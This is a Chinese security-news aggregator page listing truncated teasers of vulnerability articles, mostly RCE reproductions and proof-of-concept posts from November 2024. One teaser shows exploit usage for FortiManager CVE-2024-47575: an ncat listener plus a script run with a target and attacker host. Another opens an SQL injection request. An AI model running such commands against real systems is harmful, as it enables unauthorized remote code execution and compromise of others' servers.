某大学图书管理系统刷积分逻辑漏洞
某大学图书管理系统刷积分逻辑漏洞 原创 zkaq-brooke 掌控安全EDU 2024-11-25 04:01 扫码领资料 获网安教程 本文由掌控安全学院 – brooke 投稿 来Track安全社区投稿~ 千元稿费!还有保底奖励~(https://bbs.zkaq.cn) 这里我们首先弱口令直接进入到这个统一信息门户里面 img 直接来到图书管理系统里面。点击积分商城,可以看到
继续阅读标签: RCE
科荣AIO系统UtilServlet接口处存在代码执行漏【漏洞复现|附nuclei-POC】洞
科荣AIO系统UtilServlet接口处存在代码执行漏【漏洞复现|附nuclei-POC】洞 原创 kingkong 脚本小子 2024-11-25 03:33 免责声明: 本文内容仅供技术学习参考,请勿用于违法破坏。利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,与作者无关。如有侵权请联系删除。 漏洞描述: 科荣AIO系统UtilServlet接口处存在代
继续阅读Windows Kerberos严重漏洞,数百万台服务器遭攻击
Windows Kerberos严重漏洞,数百万台服务器遭攻击 天唯科技 天唯信息安全 2024-11-25 03:27 E安全消息,Windows Kerberos身份认证协议中存在一个严重漏洞,对数百万服务器构成了重大威胁。微软在11月补丁星期二更新中解决了此问题。 Microsoft Kerberos是一种广泛使用的用于验证主机或用户身份的身份验证协议。为了利用这个漏洞,未经身份验证的行为者
继续阅读文件解析常见漏洞总结
文件解析常见漏洞总结 unic0rn 篝火信安 2024-11-25 02:00 文件解析漏洞主要由于网站管理员操作不当或者Web容器自身的漏洞,导致一些特殊构造的其他格式文件被 IIS、apache、nginx 或其他 Web容器在某种情况下解释成脚本文件执行,导致黑客可以利用该漏洞实现非法文件的解析。 本文总结一些常见Web中间件的文件解析漏洞。 一、IIS 6.0 使用6.x版本的服务器,大
继续阅读Redis未授权主从复制RCE复现
Redis未授权主从复制RCE复现 原创 kiand 网安知识库 2024-11-25 02:00 漏洞描述 Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。 Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相
继续阅读【0Day】《黄药师》药业管理软件SetMedia_Picture_info存在SQL注入漏洞导致RCE
【0Day】《黄药师》药业管理软件SetMedia_Picture_info存在SQL注入漏洞导致RCE xiachuchunmo 银遁安全团队 2024-11-24 22:00 需要EDU SRC邀请码的师傅可以私聊后台,免费赠送EDU SRC邀请码(邀请码管够) 资产测绘 漏洞简介 **黄药师药店管理是专为零售药店打造的管理软件,集综合进销存管理,会员管理,GSP管理等于一身,其直观的界面,简
继续阅读【漏洞复现】CVE-2024-24809
【漏洞复现】CVE-2024-24809 混子Hacker 混子Hacker 2024-11-24 16:25 免责声明 请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不承担任何法律及连带责任。 [ 漏洞简介 ] —— 生活不可能像你想象的那么好,但也不会像你想象的那么糟。人的脆弱和坚强都超乎自己
继续阅读使用未知技术发现多个 XSS 漏洞
使用未知技术发现多个 XSS 漏洞 原创 星空浪子 星空网络安全 2024-11-24 04:08 今天我将讨论使用不同技术的多种 XSS 攻击,这是我在各种漏洞赏金计划中发现的。 XSS:(跨站点脚本) 是一种安全漏洞,当攻击者将恶意脚本注入其他用户查看的网页时就会发生这种情况。XSS 攻击旨在在受害者浏览器的上下文中执行恶意脚本,从而允许攻击者窃取敏感信息。例如,在 javascript 编程
继续阅读SBSCAN Spring框架渗透,这一个工具就够了|漏洞探测
SBSCAN Spring框架渗透,这一个工具就够了|漏洞探测 安全帮 2024-11-23 11:36 0x01 工具介绍 SBSCAN是一款专注于spring框架的渗透测试工具,可以对指定站点进行springboot未授权扫描/敏感信息扫描以及进行spring相关漏洞的扫描与验证。 下载地址在末尾 0x02 功能简介核心特性最全的敏感路径字典:最全的springboot站点敏感路径字典,帮你全
继续阅读【安全圈】D-Link忽视旧款VPN路由器补丁更新,关键漏洞未修复
【安全圈】D-Link忽视旧款VPN路由器补丁更新,关键漏洞未修复 安全圈 2024-11-23 11:00 关键词 在发现严重的远程代码执行 (RCE) 漏洞后,D-Link 强烈建议其旧款 VPN 路由器用户更换设备。由于这些型号的路由器已达到其使用寿命和终止支持的日期,因此不会再对其打补丁以防范该漏洞。 安全研究人员”delsploit”向D-Link报告了该漏洞,但
继续阅读全新发布!通用2.0漏洞奖励计划及第五期活动
全新发布!通用2.0漏洞奖励计划及第五期活动 补天平台 2024-11-23 06:08 EVENT 通用2.0漏洞奖励计划 -重磅发布- 通用2.0发布+通用专项活动 在当今数字环境中,网络安全挑战日益严峻。补天通用2.0致力于提供更客观、科学、严谨和负责的响应流程。采用标准化评估体系确保准确性;建立科学评分体系;确保漏洞及时响应。我们相信,唯有以客观与负责的态度,才能与白帽携手一同提升我国网络
继续阅读某CMS权限绕过漏洞(0Day)
某CMS权限绕过漏洞(0Day) Jie安全 2024-11-23 05:01 免责申明 本文章仅用于信息安全防御技术分享,因用于其他用途而产生不良后果,作者不承担任何法律责任,请严格遵循中华人民共和国相关法律法规,禁止做一切违法犯罪行为。 一、前言 不会存在相关的POC,要POC的师傅可以划走啦,这个文章记录一下自己在给xx做代码审计的一次权限绕过,大致源码方式是(得到目标->提取指纹-&
继续阅读D-Link NAS设备 account_mgr.cgi 未授权RCE漏洞(CVE-2024-10914)
D-Link NAS设备 account_mgr.cgi 未授权RCE漏洞(CVE-2024-10914) Superhero nday POC 2024-11-23 03:26 内容仅用于学习交流自查使用,由于传播、利用本公众号所提供的 POC 信息及 POC对应脚本 而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号nday poc及作者不为此承担任何责任,一旦造成后果请自行承担
继续阅读国外黑五安全系列证书折扣信息情报
国外黑五安全系列证书折扣信息情报 原创 道玄安全 道玄网安驿站 2024-11-23 03:13 “ 国外双十一到了” 看到了,关注一下 不吃亏啊,点个赞转发一下啦,WP看不下去的,可以B站搜:标松君 ,UP主录的打靶视频,欢迎关注。顺便宣传一下星球:重生者安全, 里面每天会不定期更新OSCP 知识点,车联网 ,渗透红队 以及漏洞挖掘工具 等信息分享,欢迎加入;以及想挖SRC逻辑漏洞 的朋友,可
继续阅读网络安全顶刊——TIFS 2024 论文清单与摘要(2)
网络安全顶刊——TIFS 2024 论文清单与摘要(2) 漏洞战争 漏洞战争 2024-11-23 02:26 87、Covert Transmission in Water-to-Air Optical Wireless Communication Systems 隐蔽通信通过确保合法接收者(Bob)能够满意地解码,同时隐藏信息传输,使其不被警惕的对手(Willie)发现。在本文中,我们提出了一
继续阅读网络安全顶刊——TIFS 2024 论文清单与摘要(4)
网络安全顶刊——TIFS 2024 论文清单与摘要(4) 漏洞战争 漏洞战争 2024-11-23 02:26 256、PrivGrid: Privacy-Preserving Individual Load Forecasting Service for Smart Grid 基于智能电表的个体负载预测在智能电网和家庭能源管理中的应用越来越广泛。传统的负载预测系统从用户的智能电表中以明文形式收集
继续阅读【DVWA】RCE远程命令执行实战
【DVWA】RCE远程命令执行实战 原创 儒道易行 儒道易行 2024-11-22 18:00 遇到挑战跟挫折的时侯,我有一个坚定的信念,我可以断气,但绝不能放弃 0.Command Injection(介绍) 命令注入(Command Injection) 是一种安全漏洞,攻击者通过将恶意的命令插入到应用程序或系统的输入中,从而执行未经授权的操作。它通常发生在应用程序允许用户输入某些参数,然后将
继续阅读Nacos Derby命令执行漏洞利用脚本(11月22日更新)
Nacos Derby命令执行漏洞利用脚本(11月22日更新) XiaomingX 网络安全者 2024-11-22 16:01 =================================== 免责声明请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系
继续阅读通达OA前台任意用户登录漏洞复现
通达OA前台任意用户登录漏洞复现 WIN哥学安全 2024-11-22 14:37 点击上方 蓝字关注我们 免责声明: 由于传播、利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢! 漏洞描述 通达OA是一套使用比较广泛的办公系统。该漏洞因为使用uid作为身份标识,攻
继续阅读宏景eHR uploadLogo.do 任意文件上传漏洞
宏景eHR uploadLogo.do 任意文件上传漏洞 Superhero nday POC 2024-11-22 08:16 内容仅用于学习交流自查使用,由于传播、利用本公众号所提供的 POC 信息及 POC对应脚本 而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号nday poc及作者不为此承担任何责任,一旦造成后果请自行承担!如文章有侵权烦请及时告知,我们会立即删除文章并致
继续阅读某微信万能门店小程序系统存在前台SQL注入漏洞
某微信万能门店小程序系统存在前台SQL注入漏洞 原创 Mstir 星悦安全 2024-11-22 03:42 点击上方 蓝字 关注我们 并设为 星标 0x00 前言 █ 远山起风又起雾 无人知我来时路 █ 万能门店小程序DIY建站无限独立版非微擎应用,独立版是基于国内很火的ThinkPHP5框架开发的,适用于各行各业小程序、企业门店小程序! 万能门店微信小程序不限制小程序生成数量,支持多页面,
继续阅读从 OSWE 视角看 Web 安全:超越常规,直击代码核心漏洞
从 OSWE 视角看 Web 安全:超越常规,直击代码核心漏洞 安全牛课堂 2024-11-22 03:30 现代 Web 应用程序构建于多层技术架构之上,涵盖前端的 HTML、CSS 和 JavaScript,后端的多种服务器端编程语言(例如 PHP、Java、.NET 等)以及数据库管理系统。 各组件间的交互错综复杂,为攻击者创造了众多可乘之机。 例如: 前端 JavaScript 代码若存在
继续阅读SD-WebUI未公开的0Day漏洞
SD-WebUI未公开的0Day漏洞 原创 ki9mu OneTS安全团队 2024-11-22 02:00 点击蓝字 关注我们 声明 本文属于OneTS安全团队成员ki9mu的原创文章,转载请声明出处!本文章仅用于学习交流使用,因利用此文信息而造成的任何直接或间接的后果及损失,均由使用者本人负责,OneTS安全团队及文章作者不为此承担任何责任。 SD-WebUI介绍 Stable Diffusi
继续阅读CVE-2024-47575 Fortinet FortiManager RCE exp(FortiJump)
CVE-2024-47575 Fortinet FortiManager RCE exp(FortiJump) 云梦DC 云梦安全 2024-11-22 01:11 漏洞利用方法 首先,建立您的 ncat 会话: nc -lvvnp 80 然后,执行我们的检测工件生成器: python3 CVE-2024-47575.py–target192.168.1.110–lhost192.168.1.
继续阅读46套.NET系统漏洞威胁情报(11.22更新)
46套.NET系统漏洞威胁情报(11.22更新) 专攻.NET安全的 dotNet安全矩阵 2024-11-22 00:20 46 某克医疗系统SQL注入漏洞 46.1 漏洞概述 某 克电子技术有限公司医疗急救管理系统存在SQL注入漏洞。 该应用的***Service存在SQL注入漏洞。 POST /a**/****vice.asmx HTTP/1.1 X-Requested-With: XMLH
继续阅读渗透测试案例 | 证书站学校漏洞挖掘(二)
渗透测试案例 | 证书站学校漏洞挖掘(二) 原创 零 Code4th安全团队 2024-11-22 00:15 本文由团队师傅[零]授权并发布 想必 有很多师傅都尝试过挖掘Edu src的证书站学校,这次由另外一个师傅分享证书站的捡洞经验。 首先通过信息收集拿到了一个网站,页面如下 登录一下试试,抓包如下显示用户不存在 用户不存在,呵呵,开工挖掘(狗头 哟呵,怎么不说用户不存在了,继续安排,掏出祖
继续阅读【漏洞扫描】Spring框架的漏洞扫描
【漏洞扫描】Spring框架的漏洞扫描 CllmsyK 七芒星实验室 2024-11-21 23:00 项目介绍 YYBaby是一款针对Spring框架的漏洞扫描及漏洞利用图形化工具 更新日志 更新日志 【Bug反馈请点击Help关于处联系作者】 ========================================== Top&NSdemon YYBaby_v0.9 Spri
继续阅读某次代码审计从0day变Nday的路程(漏洞分析)
某次代码审计从0day变Nday的路程(漏洞分析) 原创 Ambition 进击安全 2024-11-21 02:21 免责申明 本文章仅用于信息安全防御技术分享,因用于其他用途而产生不良后果,作者不承担任何法律责任,请严格遵循中华人民共和国相关法律法规,禁止做一切违法犯罪行为。 一、前言 在昨天一位师傅联系到我,说有一套代码找到了一个后台的任意文件上传漏洞,但是想变成前台漏洞,于是找到我进行分析
继续阅读【深度复现】D-Link NAS设备 sc_mgr.cgi 未授权RCE漏洞(CVE-2024-10914)
【深度复现】D-Link NAS设备 sc_mgr.cgi 未授权RCE漏洞(CVE-2024-10914) 原创 红岸基地赵小龙 暗影网安实验室 2024-11-21 01:00 产品简介 D.LinK NASQ 设备是一种基于网络的存储解决方案,作为网络存储设备,旨在为企业提供大容量的存储空间,并通过网络连接实现数据的访问和管理。这种设备不仅满足了企业对数据存储的需求,还提供了高效的数据共享和
继续阅读